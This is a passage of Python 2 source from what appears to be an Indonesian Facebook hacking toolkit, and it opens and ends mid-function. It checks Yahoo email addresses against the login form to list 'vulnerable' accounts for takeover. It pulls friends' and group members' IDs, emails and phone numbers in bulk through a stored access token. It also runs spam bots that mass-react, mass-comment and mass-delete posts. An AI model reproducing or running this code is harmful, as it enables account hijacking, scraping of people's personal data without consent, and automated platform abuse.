if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
